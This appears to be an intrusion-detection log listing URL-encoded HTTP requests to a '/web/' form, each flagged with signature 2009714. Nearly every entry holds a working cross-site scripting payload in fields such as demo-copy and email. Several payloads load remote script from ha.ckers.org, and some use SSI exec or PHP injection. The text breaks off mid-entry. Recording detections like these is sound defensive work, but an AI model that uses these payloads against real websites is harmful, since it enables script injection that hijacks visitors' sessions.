Packet [1156]	Uri [/web/?demo-copy=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1157]	Uri [/web/?demo-copy=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1174]	Uri [/web/?demo-copy=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1175]	Uri [/web/?demo-copy=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1176]	Uri [/web/?demo-copy=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1177]	Uri [/web/?demo-copy=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1178]	Uri [/web/?demo-copy=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1179]	Uri [/web/?demo-copy=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1180]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1181]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1184]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1185]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1206]	Uri [/web/?demo-copy=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1207]	Uri [/web/?demo-copy=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1212]	Uri [/web/?demo-copy=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1213]	Uri [/web/?demo-copy=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1222]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1223]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1224]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1225]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1226]	Uri [/web/?demo-copy=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1227]	Uri [/web/?demo-copy=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1228]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1229]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1234]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1235]	Uri [/web/?demo-copy=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1240]	Uri [/web/?demo-copy=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1241]	Uri [/web/?demo-copy=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1252]	Uri [/web/?demo-copy=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1253]	Uri [/web/?demo-copy=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1260]	Uri [/web/?demo-copy=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1261]	Uri [/web/?demo-copy=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1270]	Uri [/web/?demo-copy=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1271]	Uri [/web/?demo-copy=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1286]	Uri [/web/?demo-copy=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1287]	Uri [/web/?demo-copy=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1290]	Uri [/web/?demo-copy=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1291]	Uri [/web/?demo-copy=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1300]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1301]	Uri [/web/?demo-copy=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1308]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1309]	Uri [/web/?demo-copy=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1370]	Uri [/web/?email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1371]	Uri [/web/?email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1376]	Uri [/web/?email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1377]	Uri [/web/?email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1394]	Uri [/web/?email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1395]	Uri [/web/?email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D]	Nattacks [1]	Signatures	[2009714]
Packet [1396]	Uri [/web/?email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1397]	Uri [/web/?email=%3CSCRIPT%3Edocument.write%28%22%3CSCRI%22%29%3B%3C%2FSCRIPT%3EPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1398]	Uri [/web/?email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1399]	Uri [/web/?email=%3C%2FTITLE%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1400]	Uri [/web/?email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1401]	Uri [/web/?email=%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1404]	Uri [/web/?email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1405]	Uri [/web/?email=%3CSCRIPT+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.jpg%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1426]	Uri [/web/?email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1427]	Uri [/web/?email=%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3CSCRIPT+SRC%27%22--%3E%3C%21--%23exec+cmd%3D%22%2Fbin%2Fecho+%27%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E%27%22--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1432]	Uri [/web/?email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1433]	Uri [/web/?email=%3CSCRIPT+%22a%3D%27%3E%27%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1442]	Uri [/web/?email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1443]	Uri [/web/?email=%3CSCRIPT+a%3D%60%3E%60+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1444]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1445]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1446]	Uri [/web/?email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1447]	Uri [/web/?email=%3CSCRIPT+%3D%22blah%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1448]	Uri [/web/?email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1449]	Uri [/web/?email=%3CSCRIPT+a%3D%22blah%22+%27%27+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1454]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1455]	Uri [/web/?email=%3CSCRIPT+a%3D%22%3E%27%3E%22+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1460]	Uri [/web/?email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1461]	Uri [/web/?email=%3C%3CSCRIPT%3Ealert%28%22XSS%22%29%3B%2F%2F%3C%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1472]	Uri [/web/?email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1473]	Uri [/web/?email=%3CIMG+%22%22%22%3E%3CSCRIPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1480]	Uri [/web/?email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1481]	Uri [/web/?email=%3CSCRIPT%2FXSS+SRC%3D%22http%3A%2F%2Fha.ckers.org%2Fxss.js%22%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1490]	Uri [/web/?email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1491]	Uri [/web/?email=%3CSCRIPT%3Ea%3D%2FXSS%2F+alert%28a.source%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1506]	Uri [/web/?email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1507]	Uri [/web/?email=%3CMETA+HTTP-EQUIV%3D%22Set-Cookie%22+Content%3D%22USERID%3D%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1510]	Uri [/web/?email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1511]	Uri [/web/?email=%3C%21--%5Bif+gte+IE+4%5D%3E+%3CSCRIPT%3Ealert%28%27XSS%27%29%3B%3C%2FSCRIPT%3E+%3C%21%5Bendif%5D--%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1520]	Uri [/web/?email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1521]	Uri [/web/?email=%3CSCRIPT%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1528]	Uri [/web/?email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1529]	Uri [/web/?email=%3CSCRIPT+SRC%3Dhttp%3A%2F%2Fha.ckers.org%2Fxss.js%3E%3C%2FSCRIPT%3E]	Nattacks [1]	Signatures	[2009714]
Packet [1566]	Uri [/web/?demo-email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-priority=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-human=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-name=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&demo-copy=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&email=%3C%3F+echo%28%27%3CSCR%29%27%3B+echo%28%27IPT%3Ealert%28%22XSS%22%29%3C%2FSCRIPT%3E%27%29%3B+%3F%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1571]	Uri [/web/?demo-email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-priority=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-human=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-name=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&demo-copy=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&email=%3CHTML%3E%3CBODY%3E+%3C%3Fxml%3Anamespace+prefix%3D%22t%22+ns%3D%22urn%3Aschemas-microsoft-com%3Atime%22%3E+%3C%3Fimport+namespace%3D%22t%22+implementation%3D%22%23default%23time2%22%3E+%3Ct%3Aset+attributeName%3D%22innerHTML%22+to%3D%22XSS%3CSCRIPT+DEFER%3Ealert%28%27XSS%27%29%3C%2FSCRIPT%3E%22%3E+%3C%2FBODY%3E%3C%2FHTML%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [1580]	Uri [/web/?demo-email=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-priority=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-human=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&demo-name=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%5C%22%3Balert%2